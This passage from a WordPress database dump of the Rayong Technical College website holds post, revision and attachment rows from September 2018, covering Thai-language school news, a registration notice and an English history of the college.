(3908, 3, '2018-09-10 13:15:37', '2018-09-10 06:15:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D674345529608305%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรมแนะแนวศึกษาต่อ กับมหาวิยาลัยศรีปทุม(วิทยาเขตชลบุรี), มหาวิทยาลัยเทคโนโลยีมหานคร,สถาบัน ATP ในวันที่ 22 สิงหาคม 2561 เวลา 13.00-17.00 น. ที่ผ่านมา ณ ห้องประชุมสัมมนาอาชีวศึกษา ชั้น 3 อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5', '', '', '2018-09-10 13:15:37', '2018-09-10 06:15:37', '', 0, 'http://www.technicrayong.ac.th/?p=3908', 310, 'post', '', 0),
(3909, 3, '2018-09-10 13:13:24', '2018-09-10 06:13:24', '', '41195616_674342659608592_3291528322789408768_o', '', 'inherit', 'closed', 'closed', '', '41195616_674342659608592_3291528322789408768_o', '', '', '2018-09-10 13:13:24', '2018-09-10 06:13:24', '', 3908, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41195616_674342659608592_3291528322789408768_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3910, 3, '2018-09-10 13:15:37', '2018-09-10 06:15:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D674345529608305%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรมแนะแนวศึกษาต่อ กับมหาวิยาลัยศรีปทุม(วิทยาเขตชลบุรี), มหาวิทยาลัยเทคโนโลยีมหานคร,สถาบัน ATP ในวันที่ 22 สิงหาคม 2561 เวลา 13.00-17.00 น. ที่ผ่านมา ณ ห้องประชุมสัมมนาอาชีวศึกษา ชั้น 3 อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3908-revision-v1', '', '', '2018-09-10 13:15:37', '2018-09-10 06:15:37', '', 3908, 'http://www.technicrayong.ac.th/3908-revision-v1/', 0, 'revision', '', 0),
(3911, 3, '2018-09-10 13:20:39', '2018-09-10 06:20:39', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D674349042941287%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรมแนะแนวรับสมัครงาน กับบริษัท โกรเฮ่ สยาม จำกัด และกิจกรรมแนะแนวศึกษาต่อ กับมหาวิทยาลัยรังสิต ในวันที่ 5 กันยายน 2561 เวลา 13.00-17.00 น. ที่ผ่านมา ณ ห้องประชุมสัมมนาอาชีวศึกษา ชั้น 3 อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2-2', '', '', '2018-09-10 13:23:51', '2018-09-10 06:23:51', '', 0, 'http://www.technicrayong.ac.th/?p=3911', 309, 'post', '', 0),
(3912, 3, '2018-09-10 13:20:39', '2018-09-10 06:20:39', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D674349042941287%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'นักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรมแนะแนวรับสมัครงาน กับบริษัท โกรเฮ่ สยาม จำกัด และกิจกรรมแนะแนวศึกษาต่อ กับมหาวิทยาลัยรังสิต ในวันที่ 5 กันยายน 2561 เวลา 13.00-17.00 น. ที่ผ่านมา ณ ห้องประชุมสัมมนาอาชีวศึกษา ชั้น 3 อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3911-revision-v1', '', '', '2018-09-10 13:20:39', '2018-09-10 06:20:39', '', 3911, 'http://www.technicrayong.ac.th/3911-revision-v1/', 0, 'revision', '', 0),
(3913, 3, '2018-09-10 13:20:50', '2018-09-10 06:20:50', '', '41129150_674347142941477_1177415505527439360_o', '', 'inherit', 'closed', 'closed', '', '41129150_674347142941477_1177415505527439360_o', '', '', '2018-09-10 13:20:50', '2018-09-10 06:20:50', '', 3911, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41129150_674347142941477_1177415505527439360_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3914, 3, '2018-09-10 13:50:40', '2018-09-10 06:50:40', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D675841162792075%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ครู และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรมออกร้านให้บริการประชาชน (Fix it Center) ในงานครบรอบ 3 ปี โครงการตำรวจช่างสถานีตำรวจภูธรเมืองระยอง ภายใต้โครงการจิตรอาสาช่วยเหลือประชาชน นักท่องเที่ยว ที่ประสบเหตุรถเสียเร่งด่วน ฉุกเฉิน ในเขตท้องที่สถานีตำรวจภูธรเมืองระยอง ในวันอาทิตย์ที่ 9 กันยายน 2561 เวลา 09.00-12.00 น. ที่ผ่านมา ณ ลานด้านหน้าที่ทำการตำรวจช่างสถานีตำรวจภูธรเมืองระยอง ชุมชนไออาร์พีซี ตำบลเชิงเนิน อำเภอเมือง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%84%e0%b8%a3%e0%b8%b9-%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2018-09-10 13:50:40', '2018-09-10 06:50:40', '', 0, 'http://www.technicrayong.ac.th/?p=3914', 308, 'post', '', 0),
(3915, 3, '2018-09-10 13:49:20', '2018-09-10 06:49:20', '', '41448788_675840636125461_7365180772979834880_o', '', 'inherit', 'closed', 'closed', '', '41448788_675840636125461_7365180772979834880_o', '', '', '2018-09-10 13:49:20', '2018-09-10 06:49:20', '', 3914, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41448788_675840636125461_7365180772979834880_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3916, 3, '2018-09-10 13:50:40', '2018-09-10 06:50:40', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D675841162792075%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ครู และนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง เข้าร่วมกิจกรรมออกร้านให้บริการประชาชน (Fix it Center) ในงานครบรอบ 3 ปี โครงการตำรวจช่างสถานีตำรวจภูธรเมืองระยอง ภายใต้โครงการจิตรอาสาช่วยเหลือประชาชน นักท่องเที่ยว ที่ประสบเหตุรถเสียเร่งด่วน ฉุกเฉิน ในเขตท้องที่สถานีตำรวจภูธรเมืองระยอง ในวันอาทิตย์ที่ 9 กันยายน 2561 เวลา 09.00-12.00 น. ที่ผ่านมา ณ ลานด้านหน้าที่ทำการตำรวจช่างสถานีตำรวจภูธรเมืองระยอง ชุมชนไออาร์พีซี ตำบลเชิงเนิน อำเภอเมือง จังหวัดระยอง', '', 'inherit', 'closed', 'closed', '', '3914-revision-v1', '', '', '2018-09-10 13:50:40', '2018-09-10 06:50:40', '', 3914, 'http://www.technicrayong.ac.th/3914-revision-v1/', 0, 'revision', '', 0),
(3917, 3, '2018-09-10 13:53:19', '2018-09-10 06:53:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D675861289456729%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 10 กันยายน 2561 คุณเอกวีร์ ผลเกิด ผู้จัดการแผนกอาชีวอนามัยและความปลอดภัย บริษัท มาบตาพุด แทงค์ เทอร์มินัลจำกัด และบริษัท ระยองเทอร์มินัล จำกัด เครือ บริษัท เอส ซี จี เคมิคอลส์ จำกัด บริจาควาล์วและอุปกรณ์ข้อต่อระบบท่อ หน้าแปลน ให้แผนก วิชาเครื่องมือวัดและควบคุม วิทยาลัยเทคนิคระยอง สถาบันการอาชีวศึกษาภาคตะวันออก เพื่อให้นักศึกษาได้ฝึกปฏิบัติจริง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-10-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99%e2%80%8b-2561', '', '', '2018-09-10 13:53:19', '2018-09-10 06:53:19', '', 0, 'http://www.technicrayong.ac.th/?p=3917', 307, 'post', '', 0),
(3918, 3, '2018-09-10 13:51:56', '2018-09-10 06:51:56', '', '41394299_675860699456788_4022449653973778432_n', '', 'inherit', 'closed', 'closed', '', '41394299_675860699456788_4022449653973778432_n', '', '', '2018-09-10 13:51:56', '2018-09-10 06:51:56', '', 3917, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41394299_675860699456788_4022449653973778432_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(3919, 3, '2018-09-10 13:53:19', '2018-09-10 06:53:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D675861289456729%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 10 กันยายน 2561 คุณเอกวีร์ ผลเกิด ผู้จัดการแผนกอาชีวอนามัยและความปลอดภัย บริษัท มาบตาพุด แทงค์ เทอร์มินัลจำกัด และบริษัท ระยองเทอร์มินัล จำกัด เครือ บริษัท เอส ซี จี เคมิคอลส์ จำกัด บริจาควาล์วและอุปกรณ์ข้อต่อระบบท่อ หน้าแปลน ให้แผนก วิชาเครื่องมือวัดและควบคุม วิทยาลัยเทคนิคระยอง สถาบันการอาชีวศึกษาภาคตะวันออก เพื่อให้นักศึกษาได้ฝึกปฏิบัติจริง', '', 'inherit', 'closed', 'closed', '', '3917-revision-v1', '', '', '2018-09-10 13:53:19', '2018-09-10 06:53:19', '', 3917, 'http://www.technicrayong.ac.th/3917-revision-v1/', 0, 'revision', '', 0),
(3920, 3, '2018-09-10 13:56:07', '2018-09-10 06:56:07', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h2><span style=\"color: #808080;\"><strong>Rayong Technical College Background </strong></span></h2>\r\n<h4><span style=\"color: #808080;\"><strong>Located </strong>086/13, Taksin Maharach Rd, Tapradoo Sub-district,</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Muang District, Rayong, Thailand 21000</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>Tel: 038-611-160, 038-611-192 Fax: 038-970-717</span></h4>\r\n<h4><span style=\"color: #808080;\"><span style=\"color: #ffffff;\">0000000000</span>The area of 122,468 sqm. (76 rai 2 ngan 17 sqw.)</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> on the 3rd<sup> </sup>of October 1938 the Department of Vocational Education worked side by side with Rayong province to establish \"Chang Mai Rayong School” (Carpentry School). First the students studied on an empty lot in an unused sermon hall in the monastery of “Wat Keng”. This was a temporary place of study. Rayong hospital is now situated on the grounds that held “wat Keng\" Later the school received a generous donation of 8,000 sqm (5 rai) of land from Mr. Lieng Piempongsan. This was used to establish a place of education in a sub district of Rayong. To this day it remains the site and place of learning that is Rayong Technical College.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>Background,</strong> in 1958 the school bought additional land of 8,000 sqm (5 rai) and got approved for a name change to “Karn Chang Mai Rayong School”. In 1966 The Ministry of Education affirmed that “Karn Chang Mai Rayong School” and “Karn Chang Satree Rayong” would be combined and become known as “ Karn Chang Rayong School” . On the </span><span style=\"color: #808080;\">1st<sup> </sup></span><span style=\"color: #808080;\">of October 1977 the school was upgraded to “Rayong Technical School”. Then on the 1st of May 1980 the school was elevated to what we know it as today \"Rayong Technical College\"</span></h4>\r\n<h2><strong><span style=\"color: #808080;\">Education Management </span></strong></h2>\r\n<h4><span style=\"color: #808080;\"><strong>In 1938</strong> was the beginning of the vocational education and training for 3-year course for grade 4 graduates to study in the carpentry department. The first generation totaled 34 students. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1942</strong> the Hairdresser department opened providing a 2-year course, later this was cancelled due to the lack of students.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1949</strong> the Hairdresser department was reopened and 3 more classrooms were built for 1st year students of carpentry. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1950</strong> the Hairdresser department was shut down for the second time.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1953</strong> Education expansion for senior high school graduates, vocational junior high school graduates and grade 9 to enter the 3-year carpentry course. </span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1957</strong> a course to study to be a mechanic opened up for vocational senior high school graduates.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1960</strong> the carpentry department opened for high vocational education graduates and the mechanic department was cancelled.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1963</strong> the mechanic department opened for the second time and a vocational education construction department also opened up to grade 10-12.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1970</strong> the sheet metal welder department opened up for senior high school.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1976</strong> the machine shop department opened up for vocational certificate holders.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1977</strong> the electric power department opened up for vocational certificate holders.</span></h4>\r\n<h4><span style=\"color: #808080;\"><strong>In 1979</strong> the commercial department opened up for vocational certificate holders.</span></h4>', 'The College Background', '', 'inherit', 'closed', 'closed', '', '3626-revision-v1', '', '', '2018-09-10 13:56:07', '2018-09-10 06:56:07', '', 3626, 'http://www.technicrayong.ac.th/3626-revision-v1/', 0, 'revision', '', 0),
(3922, 3, '2018-09-11 12:01:28', '2018-09-11 05:01:28', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F09%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9B.%E0%B8%95%E0%B8%A3%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ กำหนดการลงทะเบียน นักศึกษาระดับปริญญาตรี หลักสูตรเทคโนโลยีบัณฑิต สาขาวิชาเทคโนโลยียานยนต์ สถาบันการอาชีวศึกษาภาคตะวันออก ประจำปีการศึกษา 2/2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a5%e0%b8%87%e0%b8%97%e0%b8%b0%e0%b9%80%e0%b8%9a%e0%b8%b5%e0%b8%a2', '', '', '2018-09-11 12:01:28', '2018-09-11 05:01:28', '', 0, 'http://www.technicrayong.ac.th/?p=3922', 306, 'post', '', 0),
(3923, 3, '2018-09-11 12:01:07', '2018-09-11 05:01:07', '', 'ประกาศป.ตรี', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9b-%e0%b8%95%e0%b8%a3%e0%b8%b5', '', '', '2018-09-11 12:01:07', '2018-09-11 05:01:07', '', 3922, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/ประกาศป.ตรี.pdf', 0, 'attachment', 'application/pdf', 0),
(3924, 3, '2018-09-11 12:01:28', '2018-09-11 05:01:28', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F09%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9B.%E0%B8%95%E0%B8%A3%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ กำหนดการลงทะเบียน นักศึกษาระดับปริญญาตรี หลักสูตรเทคโนโลยีบัณฑิต สาขาวิชาเทคโนโลยียานยนต์ สถาบันการอาชีวศึกษาภาคตะวันออก ประจำปีการศึกษา 2/2561', '', 'inherit', 'closed', 'closed', '', '3922-revision-v1', '', '', '2018-09-11 12:01:28', '2018-09-11 05:01:28', '', 3922, 'http://www.technicrayong.ac.th/3922-revision-v1/', 0, 'revision', '', 0),
(3925, 3, '2018-09-11 12:04:29', '2018-09-11 05:04:29', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D676263649416493%26id%3D100010985913485&width=500\" width=\"500\" height=\"770\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยองได้รับรางวัลชนะเลิศ เนื่องในการประกวดสุดยอดนวัตกรรมอาชีวศึกษา “อาหารไทย 4.0” ระดับชาติ ประจำปีการศึกษา 2561 จัดขึ้นระหว่างวันที่ 6 - 7 กันยายน 2561 ณ ห้องไดมอนด์ฮอลล์ ชั้น 5 ศูนย์การค้าเซียร์ รังสิต อำเภอลำลูกกา จังหวัดปทุมธานี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87%e0%b9%84%e0%b8%94%e0%b9%89', '', '', '2018-09-11 12:04:29', '2018-09-11 05:04:29', '', 0, 'http://www.technicrayong.ac.th/?p=3925', 305, 'post', '', 0),
(3926, 3, '2018-09-11 12:04:14', '2018-09-11 05:04:14', '', '41512414_676262956083229_1134271403692916736_o', '', 'inherit', 'closed', 'closed', '', '41512414_676262956083229_1134271403692916736_o', '', '', '2018-09-11 12:04:14', '2018-09-11 05:04:14', '', 3925, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/41512414_676262956083229_1134271403692916736_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3927, 3, '2018-09-11 12:04:29', '2018-09-11 05:04:29', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D676263649416493%26id%3D100010985913485&width=500\" width=\"500\" height=\"770\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยองได้รับรางวัลชนะเลิศ เนื่องในการประกวดสุดยอดนวัตกรรมอาชีวศึกษา “อาหารไทย 4.0” ระดับชาติ ประจำปีการศึกษา 2561 จัดขึ้นระหว่างวันที่ 6 - 7 กันยายน 2561 ณ ห้องไดมอนด์ฮอลล์ ชั้น 5 ศูนย์การค้าเซียร์ รังสิต อำเภอลำลูกกา จังหวัดปทุมธานี', '', 'inherit', 'closed', 'closed', '', '3925-revision-v1', '', '', '2018-09-11 12:04:29', '2018-09-11 05:04:29', '', 3925, 'http://www.technicrayong.ac.th/3925-revision-v1/', 0, 'revision', '', 0),
(3932, 3, '2018-09-18 09:38:51', '2018-09-18 02:38:51', '', '14-3-2561 9-15-49', '', 'inherit', 'closed', 'closed', '', '14-3-2561-9-15-49-2', '', '', '2018-09-18 09:38:51', '2018-09-18 02:38:51', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg', 0, 'attachment', 'image/jpeg', 0),
(3933, 3, '2018-09-18 09:39:23', '2018-09-18 02:39:23', '', '18-9-2561 9-23-35', '', 'inherit', 'closed', 'closed', '', '18-9-2561-9-23-35', '', '', '2018-09-18 09:39:23', '2018-09-18 02:39:23', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg', 0, 'attachment', 'image/jpeg', 0),
(3934, 3, '2018-09-18 09:41:26', '2018-09-18 02:41:26', '', '18-9-2561 9-43-33', '', 'inherit', 'closed', 'closed', '', '18-9-2561-9-43-33', '', '', '2018-09-18 09:41:26', '2018-09-18 02:41:26', '', 1451, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/18-9-2561-9-43-33.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3935, 3, '2018-09-18 09:43:01', '2018-09-18 02:43:01', '<a href=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-3932\" src=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a><a href=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\"><img class=\"aligncenter wp-image-3933\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\" alt=\"\" width=\"382\" height=\"100\" /></a><a href=\"/wp-content/uploads/2018/09/18-9-2561-9-43-33.jpg\"><img class=\"aligncenter size-full wp-image-3934\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-43-33.jpg\" alt=\"\" width=\"195\" height=\"240\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-3452\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" />\r\n\r\n<img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3386\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-29-52.jpg\" alt=\"\" width=\"691\" height=\"331\" />\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1590 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-44-12.jpg\" alt=\"\" width=\"675\" height=\"311\" />\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" /> <img class=\"aligncenter wp-image-3383 size-full\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-25-00.jpg\" alt=\"\" width=\"780\" height=\"645\" />\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-3388\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-33-19.jpg\" alt=\"\" width=\"279\" height=\"339\" />\r\n<h6><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a></h6>\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-09-18 09:43:01', '2018-09-18 02:43:01', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(3936, 3, '2018-09-18 09:57:41', '2018-09-18 02:57:41', '', '18-9-2561 9-59-38', '', 'inherit', 'closed', 'closed', '', '18-9-2561-9-59-38', '', '', '2018-09-18 09:57:41', '2018-09-18 02:57:41', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/09/18-9-2561-9-59-38.jpg', 0, 'attachment', 'image/jpeg', 0),
